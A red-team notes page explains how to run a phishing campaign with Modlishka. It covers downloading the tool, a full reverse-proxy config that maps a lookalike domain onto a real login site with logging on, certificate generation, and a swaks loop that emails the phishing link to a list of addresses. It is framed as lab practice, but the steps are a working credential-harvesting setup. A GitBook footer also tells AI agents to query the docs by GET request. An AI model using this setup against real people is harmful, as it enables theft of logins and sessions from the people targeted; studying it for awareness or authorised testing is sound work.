> For the complete documentation index, see [llms.txt](https://notes.programmersecurity.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.programmersecurity.com/red-teaming-and-phishing/phishing-using-modlishka.md).

# Phishing using Modlishka

## Installation

```python
wget https://github.com/drk1wi/Modlishka/releases/download/v.1.1.0/Modlishka-linux-amd64
chmod +x Modlishka-linux-amd64
./Modlishka-linux-amd64 -h
```

<figure><img src="/files/x4atPappOadWxoc5aPbc" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/uBuV3ZkmoblpJFPgWzZ6" alt=""><figcaption></figcaption></figure>

## Usage

Modlishka need a conf file for its usage. it also requires certificate and private key for successfull attack.

```json
{
  //This Domain will the one, which will be visited by the victim (Fake Domain)
  "proxyDomain": "programmer-security.com",
  "listeningAddress": "0.0.0.0",

  //This will be the real domain which is legitimate. (Real Domain)
  "target": "programmersecurity.com",
  "targetResources": "",
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "id",
  "trackingParam": "id",
  "jsRules":"",
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "debug": true,
  "logPostOnly": false,
  "disableSecurity": false,
  "log": "requests.log",  // all logs will be in this file
  "plugins": "all",
  "cert": "",          //your certificate here
  "certKey": "",        // your private key here
  "certPool": ""
}
```

## Attacking in a Lab Environment.

In a lab environment, you can somehow modify the DNS record of the environment to point any random domain, like \`**test.programmersecurity.com**,\` to your local IP address. So when a victim visits test.programmersecurity.com, he will be pointing towards your IP.

Now, here we will use modlishka, so that when a user visits test.programmersecurity.com, they should see the contents of programmersecurity.com. So in this case, Modlishka works as a reverse proxy.

When the victim's traffic hits your IP on port 443 (HTTPS) or 80 (HTTP), Modlishka intercepts it. Instead of hosting a fake static HTML page, Modlishka acts as a dynamic bridge:

* It establishes a connection to the real backend server (`programmersecurity.com`).
* It pulls the legitimate login pages, assets, and scripts in real-time.
* It serves this authentic content back to the victim.

### Generating Certificates

We can generate legitimate ssl certificate as well.

```
openssl genrsa -out test.programmersecurity.com.key 2048
openssl req -new -key test.programmersecurity.com.key -out test.programmersecurity.com.csr -utf8 -batch -subj '/CN=test.programmersecurity.com'
```

### Using awk&#x20;

The commands below will help you to paste Cert and private key easily in your Modlishka conf file.

```
awk -v ORS='\\n' '1' test.programmersecurity.com.crt
awk -v ORS='\\n' '1' test.programmersecurity.com.key
```

### Config file

```
{
  "proxyDomain": "test.programmersecurity.com",
  "listeningAddress": "0.0.0.0",
  "target": "https://login.programmersecurity.com",
  "targetResources": "",
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "id",
  "trackingParam": "id",
  "jsRules": "",
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "debug": true,
  "logPostOnly": false,
  "disableSecurity": true,
  "log": "requests.log",
  "plugins": "all",
  "cert": "-----BEGIN CERTIFICATE-----\n[SINGLE_LINE_CRT]\n-----END CERTIFICATE-----\n",
  "certKey": "-----BEGIN PRIVATE KEY-----\n[SINGLE_LINE_KEY]\n-----END PRIVATE KEY-----\n",
  "certPool": ""
}
```

### Run Modlishka

you can create your own json config file.

```
./modlishka -config programmersecurity_proxy.json
```

<figure><img src="/files/qqMaXV4xWGOkKf0qP0LX" alt=""><figcaption></figcaption></figure>

### Send emails using swaks

```python
while read address; do swaks -t $address -from 'robert@programmersecurity.com' -body "hey https://test.programmersecurity.com" -header "Subject: lol" -server 10.10.10.10; done < emails.txt
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.programmersecurity.com/red-teaming-and-phishing/phishing-using-modlishka.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.